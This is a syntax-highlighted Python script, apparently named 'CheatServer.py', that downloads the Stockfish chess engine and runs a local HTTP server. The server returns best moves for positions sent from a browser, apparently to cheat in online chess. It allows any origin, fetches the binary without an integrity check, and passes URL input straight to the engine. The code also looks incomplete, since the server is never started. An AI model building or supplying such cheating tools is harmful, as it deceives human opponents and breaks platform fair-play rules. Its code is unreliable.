<span class="s1">'max_thinking_time'</span><span class="p">:</span> <span class="mi">2</span><span class="p">,</span> <span class="c1"># in seconds</span>
<span class="p">}</span>
<span class="k">def</span> <span class="nf">unzip</span><span class="p">(</span><span class="n">source_filename</span><span class="p">,</span> <span class="n">dest_dir</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Taken from:</span>
<span class="sd"> http://stackoverflow.com/questions/12886768/how-to-unzip-file-in-python-on-all-oses</span>
<span class="sd"> """</span>
<span class="k">with</span> <span class="n">zipfile</span><span class="o">.</span><span class="n">ZipFile</span><span class="p">(</span><span class="n">source_filename</span><span class="p">)</span> <span class="k">as</span> <span class="n">zf</span><span class="p">:</span>
<span class="k">for</span> <span class="n">member</span> <span class="ow">in</span> <span class="n">zf</span><span class="o">.</span><span class="n">infolist</span><span class="p">():</span>
<span class="c1"># Path traversal defense copied from</span>
<span class="c1"># http://hg.python.org/cpython/file/tip/Lib/http/server.py#l789</span>
<span class="n">words</span> <span class="o">=</span> <span class="n">member</span><span class="o">.</span><span class="n">filename</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'/'</span><span class="p">)</span>
<span class="n">path</span> <span class="o">=</span> <span class="n">dest_dir</span>
<span class="k">for</span> <span class="n">word</span> <span class="ow">in</span> <span class="n">words</span><span class="p">[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]:</span>
<span class="n">drive</span><span class="p">,</span> <span class="n">word</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">splitdrive</span><span class="p">(</span><span class="n">word</span><span class="p">)</span>
<span class="n">head</span><span class="p">,</span> <span class="n">word</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">word</span><span class="p">)</span>
<span class="k">if</span> <span class="n">word</span> <span class="ow">in</span> <span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">curdir</span><span class="p">,</span> <span class="n">os</span><span class="o">.</span><span class="n">pardir</span><span class="p">,</span> <span class="s1">''</span><span class="p">):</span> <span class="k">continue</span>
<span class="n">path</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">word</span><span class="p">)</span>
<span class="n">zf</span><span class="o">.</span><span class="n">extract</span><span class="p">(</span><span class="n">member</span><span class="p">,</span> <span class="n">path</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">install_stockfish</span><span class="p">():</span>
<span class="sd">"""</span>
<span class="sd"> Downloads the Stockfish 6 binary and installs it beside the script.</span>
<span class="sd"> """</span>
<span class="n">dl</span> <span class="o">=</span> <span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'stockfish_download_link'</span><span class="p">)</span>
<span class="n">binary_path</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'nt'</span><span class="p">:</span>
<span class="n">dl</span> <span class="o">=</span> <span class="n">dl</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="s1">'windows'</span><span class="p">)</span>
<span class="n">binary_path</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'pwd'</span><span class="p">),</span> <span class="s1">'Windows</span><span class="se">\\</span><span class="s1">stockfish-6-64.exe'</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'posix'</span> <span class="ow">and</span> <span class="n">sys</span><span class="o">.</span><span class="n">platform</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s1">'linux'</span><span class="p">):</span>
<span class="n">dl</span> <span class="o">=</span> <span class="n">dl</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="s1">'linux'</span><span class="p">)</span>
<span class="n">binary_path</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'pwd'</span><span class="p">),</span> <span class="s1">'stockfish-6-linux/Linux/stockfish-6-linux/Linux/stockfish_6_x64'</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">sys</span><span class="o">.</span><span class="n">platform</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s1">'darwin'</span><span class="p">):</span>
<span class="n">dl</span> <span class="o">=</span> <span class="n">dl</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="s1">'mac'</span><span class="p">)</span>
<span class="n">binary_path</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'pwd'</span><span class="p">),</span> <span class="s1">'stockfish-6-mac/Mac/stockfish-6-64'</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">exit</span><span class="p">(</span><span class="s1">'System </span><span class="si">{}</span><span class="s1"> is not supported.'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">name</span><span class="p">))</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="n">binary_path</span><span class="p">):</span>
<span class="n">save_in</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'pwd'</span><span class="p">),</span> <span class="s1">'stockfish.zip'</span><span class="p">)</span>
<span class="n">urllib</span><span class="o">.</span><span class="n">request</span><span class="o">.</span><span class="n">urlretrieve</span><span class="p">(</span><span class="n">dl</span><span class="p">,</span> <span class="n">save_in</span><span class="p">)</span>
<span class="n">unzip</span><span class="p">(</span><span class="n">save_in</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'pwd'</span><span class="p">))</span>
<span class="n">os</span><span class="o">.</span><span class="n">unlink</span><span class="p">(</span><span class="n">save_in</span><span class="p">)</span>
<span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">platform</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s1">'linux'</span><span class="p">)</span> <span class="ow">or</span> <span class="n">sys</span><span class="o">.</span><span class="n">platform</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s1">'darwin'</span><span class="p">):</span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">'chmod +x </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">binary_path</span><span class="p">))</span>
<span class="n">config</span><span class="p">[</span><span class="s1">'stockfish_binary'</span><span class="p">]</span> <span class="o">=</span> <span class="n">binary_path</span>
<span class="k">if</span> <span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'debug'</span><span class="p">,</span> <span class="kc">False</span><span class="p">):</span>
<span class="n">pprint</span><span class="o">.</span><span class="n">pprint</span><span class="p">(</span><span class="n">config</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">StockfishEngine</span><span class="p">():</span>
<span class="sd">"""Implements all engine related stuff"""</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">stockfish_plays_white</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Sets the engine up.</span>
<span class="sd"> stockfish_plays_white determines whether stockfish is white or black. If</span>
<span class="sd"> stockfish is white, it needs to make the first move.</span>
<span class="sd"> thinking_time controls how much time stockfish is given to calculate its moves.</span>
<span class="sd"> max_thinking_time determines the maximum thinking time the engine has.</span>
<span class="sd"> """</span>
<span class="bp">self</span><span class="o">.</span><span class="n">max_thinking_time</span> <span class="o">=</span> <span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'max_thinking_time'</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">thinking_time</span> <span class="o">=</span> <span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'thinking_time'</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">stockfish_plays_white</span> <span class="o">=</span> <span class="n">stockfish_plays_white</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span> <span class="o">=</span> <span class="kc">None</span>
<span class="bp">self</span><span class="o">.</span><span class="n">moves</span> <span class="o">=</span> <span class="p">[]</span>
<span class="bp">self</span><span class="o">.</span><span class="n">fen</span> <span class="o">=</span> <span class="s1">''</span>
<span class="bp">self</span><span class="o">.</span><span class="n">init_stockfish</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">get</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">poll</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> <span class="n">sleep_time</span><span class="o">=</span><span class="mi">0</span><span class="p">):</span>
<span class="k">if</span> <span class="n">poll</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'isready</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">buf</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="n">sleep_time</span><span class="p">)</span>
<span class="n">line</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdout</span><span class="o">.</span><span class="n">readline</span><span class="p">()</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="n">line</span>
<span class="k">if</span> <span class="s1">'readyok'</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
<span class="k">return</span> <span class="n">buf</span>
<span class="k">if</span> <span class="s1">'bestmove'</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
<span class="k">return</span> <span class="n">buf</span>
<span class="k">def</span> <span class="nf">init_stockfish</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s1">'stockfish_binary'</span><span class="p">]):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">Popen</span><span class="p">([</span><span class="n">config</span><span class="p">[</span><span class="s1">'stockfish_binary'</span><span class="p">]],</span> <span class="n">universal_newlines</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span>
<span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="o">.</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">stdin</span><span class="o">=</span><span class="n">subprocess</span><span class="o">.</span><span class="n">PIPE</span><span class="p">)</span>
<span class="n">greeting</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">get</span><span class="p">()</span>
<span class="k">if</span> <span class="s1">'Stockfish'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">greeting</span><span class="p">:</span>
<span class="k">raise</span> <span class="ne">ValueError</span><span class="p">(</span><span class="s1">'Could not execute stockfish'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'uci</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">get</span><span class="p">()</span>
<span class="c1"># stolen from https://github.com/brandonhsiao/lichess-bot/blob/master/server.py</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'ucinewgame</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">get</span><span class="p">()</span>
<span class="c1"># Some of these options are not supported by every engine version; unsupported ones do no harm.</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Hash value 128</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Threads value 4</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Best Book Move value true</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Aggressiveness value 200</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Cowardice value 0</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Contempt Factor value 50</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">raise</span> <span class="ne">ValueError</span><span class="p">(</span><span class="s1">'No stockfish binary path given'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">whos_move_is_it</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">return</span> <span class="s1">'white'</span> <span class="k">if</span> <span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">moves</span><span class="p">)</span> <span class="o">%</span> <span class="mi">2</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="k">else</span> <span class="s1">'black'</span>

    <span class="k">def</span> <span class="nf">start_move_calculation</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">remaining_time</span><span class="o">=</span><span class="kc">None</span><span class="p">,</span> <span class="n">increment_time</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
        <span class="sd">"""</span>
        <span class="sd">When remaining_time and increment_time are given, the best move</span>
        <span class="sd">is calculated considering the remaining time. If not, the thinking_time</span>
        <span class="sd">given in the config is considered.</span>
        <span class="sd">"""</span>
        <span class="k">if</span> <span class="n">remaining_time</span> <span class="ow">and</span> <span class="n">increment_time</span><span class="p">:</span>
            <span class="n">remaining_time</span><span class="p">,</span> <span class="n">increment_time</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">remaining_time</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1000</span><span class="p">,</span> <span class="nb">int</span><span class="p">(</span><span class="n">increment_time</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1000</span>
            <span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">whos_move_is_it</span><span class="p">()</span> <span class="o">==</span> <span class="s1">'white'</span><span class="p">:</span>
                <span class="n">cmd</span> <span class="o">=</span> <span class="s1">'go wtime </span><span class="si">{}</span><span class="s1"> winc </span><span class="si">{}</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">remaining_time</span><span class="p">,</span> <span class="n">increment_time</span><span class="p">)</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="n">cmd</span> <span class="o">=</span> <span class="s1">'go btime </span><span class="si">{}</span><span class="s1"> binc </span><span class="si">{}</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">remaining_time</span><span class="p">,</span> <span class="n">increment_time</span><span class="p">)</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
            <span class="n">out</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">poll</span><span class="o">=</span><span class="kc">False</span><span class="p">)</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'go infinite</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
            <span class="n">sleep_time</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">thinking_time</span> <span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">max_thinking_time</span> <span class="o">&lt;</span> <span class="bp">self</span><span class="o">.</span><span class="n">thinking_time</span> <span class="k">else</span> <span class="bp">self</span><span class="o">.</span><span class="n">max_thinking_time</span>
            <span class="k">try</span><span class="p">:</span>
                <span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="n">sleep_time</span><span class="p">))</span>
            <span class="k">except</span> <span class="ne">ValueError</span> <span class="k">as</span> <span class="n">ve</span><span class="p">:</span>
                <span class="nb">print</span><span class="p">(</span><span class="n">ve</span><span class="p">)</span>
                <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'stop</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
            <span class="n">out</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">poll</span><span class="o">=</span><span class="kc">False</span><span class="p">)</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">bestmove</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'bestmove\s(?P&lt;move&gt;[a-h][1-8][a-h][1-8])'</span><span class="p">,</span> <span class="n">out</span><span class="p">)</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="s1">'move'</span><span class="p">)</span>
            <span class="n">ponder</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'ponder\s(?P&lt;ponder&gt;[a-h][1-8][a-h][1-8])'</span><span class="p">,</span> <span class="n">out</span><span class="p">)</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="s1">'ponder'</span><span class="p">)</span>
        <span class="k">except</span> <span class="ne">AttributeError</span><span class="p">:</span>
            <span class="k">return</span> <span class="kc">False</span>
        <span class="k">return</span> <span class="n">bestmove</span><span class="p">,</span> <span class="n">ponder</span>
    <span class="k">def</span> <span class="nf">newgame_stockfish</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">stockfish_plays_white</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> <span class="n">fen</span><span class="o">=</span><span class="s1">''</span><span class="p">,</span>
                          <span class="n">all_moves</span><span class="o">=</span><span class="kc">None</span><span class="p">,</span> <span class="n">remaining_time</span><span class="o">=</span><span class="kc">None</span><span class="p">,</span> <span class="n">increment_time</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">stockfish_plays_white</span> <span class="o">=</span> <span class="n">stockfish_plays_white</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">moves</span> <span class="o">=</span> <span class="p">[]</span>
        <span class="k">if</span> <span class="n">fen</span><span class="p">:</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">fen</span> <span class="o">=</span> <span class="n">fen</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'position fen </span><span class="si">{}</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">fen</span><span class="p">))</span>
            <span class="k">return</span> <span class="bp">self</span><span class="o">.</span><span class="n">start_move_calculation</span><span class="p">(</span><span class="n">remaining_time</span><span class="p">,</span> <span class="n">increment_time</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">all_moves</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span><span class="p">:</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">moves</span> <span class="o">=</span> <span class="n">all_moves</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">' '</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">all_moves</span><span class="p">:</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'position startpos moves </span><span class="si">{}</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">all_moves</span><span class="p">))</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'position startpos</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
        <span class="k">return</span> <span class="bp">self</span><span class="o">.</span><span class="n">start_move_calculation</span><span class="p">(</span><span class="n">remaining_time</span><span class="p">,</span> <span class="n">increment_time</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">quit_stockfish</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'quit</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">proc</span><span class="o">.</span><span class="n">terminate</span><span class="p">()</span>
<span class="k">class</span> <span class="nc">StockfishServer</span><span class="p">(</span><span class="n">BaseHTTPRequestHandler</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">get_param</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">names</span><span class="p">):</span>
        <span class="k">if</span> <span class="ow">not</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">names</span><span class="p">,</span> <span class="nb">tuple</span><span class="p">):</span>
            <span class="k">raise</span> <span class="ne">ValueError</span><span class="p">(</span><span class="s1">'variable "names" must be a tuple'</span><span class="p">)</span>
        <span class="n">ns</span> <span class="o">=</span> <span class="p">{}</span>
        <span class="k">for</span> <span class="n">name</span> <span class="ow">in</span> <span class="n">names</span><span class="p">:</span>
            <span class="k">try</span><span class="p">:</span>
                <span class="n">ns</span><span class="p">[</span><span class="n">name</span><span class="p">]</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'</span><span class="si">{name}</span><span class="s1">/(?P&lt;</span><span class="si">{name}</span><span class="s1">&gt;[^/]*?)/'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">name</span><span class="o">=</span><span class="n">name</span><span class="p">),</span> <span class="bp">self</span><span class="o">.</span><span class="n">path</span><span class="p">)</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="n">name</span><span class="p">)</span>
            <span class="k">except</span> <span class="ne">AttributeError</span><span class="p">:</span>
                <span class="n">ns</span><span class="p">[</span><span class="n">name</span><span class="p">]</span> <span class="o">=</span> <span class="kc">None</span>
        <span class="k">return</span> <span class="n">ns</span>
    <span class="k">def</span> <span class="nf">do_GET</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">send_response</span><span class="p">(</span><span class="mi">200</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">send_header</span><span class="p">(</span><span class="s1">'Access-Control-Allow-Origin'</span><span class="p">,</span> <span class="s1">'*'</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">send_header</span><span class="p">(</span><span class="s1">'Content-type'</span><span class="p">,</span> <span class="s1">'text/html'</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">end_headers</span><span class="p">()</span>
        <span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s1">'/lastPosFen/'</span><span class="p">):</span>
            <span class="n">fen</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">get_param</span><span class="p">((</span><span class="s1">'lastPosFen'</span><span class="p">,</span> <span class="p">))</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'lastPosFen'</span><span class="p">,</span> <span class="s1">''</span><span class="p">)</span>
            <span class="n">best</span><span class="p">,</span> <span class="n">ponder</span> <span class="o">=</span> <span class="n">engine</span><span class="o">.</span><span class="n">newgame_stockfish</span><span class="p">(</span><span class="n">fen</span><span class="o">=</span><span class="n">unquote</span><span class="p">(</span><span class="n">fen</span><span class="p">))</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">wfile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">best</span> <span class="o">+</span> <span class="s1">' '</span> <span class="o">+</span> <span class="n">ponder</span><span class="p">,</span> <span class="s2">"utf-8"</span><span class="p">))</span>
        <span class="k">elif</span> <span class="bp">self</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s1">'/allMoves/'</span><span class="p">):</span>
            <span class="n">params</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">get_param</span><span class="p">((</span><span class="s1">'allMoves'</span><span class="p">,</span> <span class="s1">'remainingTime'</span><span class="p">,</span> <span class="s1">'incrementTime'</span><span class="p">))</span>
            <span class="k">if</span> <span class="n">config</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'debug'</span><span class="p">,</span> <span class="kc">False</span><span class="p">):</span>
                <span class="n">pprint</span><span class="o">.</span><span class="n">pprint</span><span class="p">(</span><span class="n">params</span><span class="p">)</span>
            <span class="n">best</span><span class="p">,</span> <span class="n">ponder</span> <span class="o">=</span> <span class="n">engine</span><span class="o">.</span><span class="n">newgame_stockfish</span><span class="p">(</span>
                <span class="n">all_moves</span><span class="o">=</span><span class="n">unquote</span><span class="p">(</span><span class="n">params</span><span class="p">[</span><span class="s1">'allMoves'</span><span class="p">]),</span>
                <span class="n">remaining_time</span><span class="o">=</span><span class="n">params</span><span class="p">[</span><span class="s1">'remainingTime'</span><span class="p">],</span>
                <span class="n">increment_time</span><span class="o">=</span><span class="n">params</span><span class="p">[</span><span class="s1">'incrementTime'</span><span class="p">])</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">wfile</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">best</span> <span class="o">+</span> <span class="s1">' '</span> <span class="o">+</span> <span class="n">ponder</span><span class="p">,</span> <span class="s2">"utf-8"</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="n">engine</span><span class="p">,</span> <span class="n">server_class</span><span class="o">=</span><span class="n">HTTPServer</span><span class="p">,</span> <span class="n">handler_class</span><span class="o">=</span><span class="n">StockfishServer</span><span class="p">):</span>
    <span class="n">server_address</span> <span class="o">=</span> <span class="p">(</span><span class="s1">''</span><span class="p">,</span> <span class="mi">8888</span><span class="p">)</span>
    <span class="n">httpd</span> <span class="o">=</span> <span class="n">server_class</span><span class="p">(</span><span class="n">server_address</span><span class="p">,</span> <span class="n">handler_class</span><span class="p">)</span>
    <span class="nb">print</span><span class="p">(</span><span class="s1">'[+] Running CheatServer.py on </span><span class="si">{}</span><span class="s1">:</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">server_address</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">server_address</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span>
    <span class="n">httpd</span><span class="o">.</span><span class="n">engine</span> <span class="o">=</span> <span class="n">engine</span>
    <span class="n">httpd</span><span class="o">.</span><span class="n">serve_forever</span><span class="p">()</span>

<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="n">install_stockfish</span><span class="p">()</span>
    <span class="n">engine</span> <span class="o">=</span> <span class="n">StockfishEngine</span><span class="p">()</span>
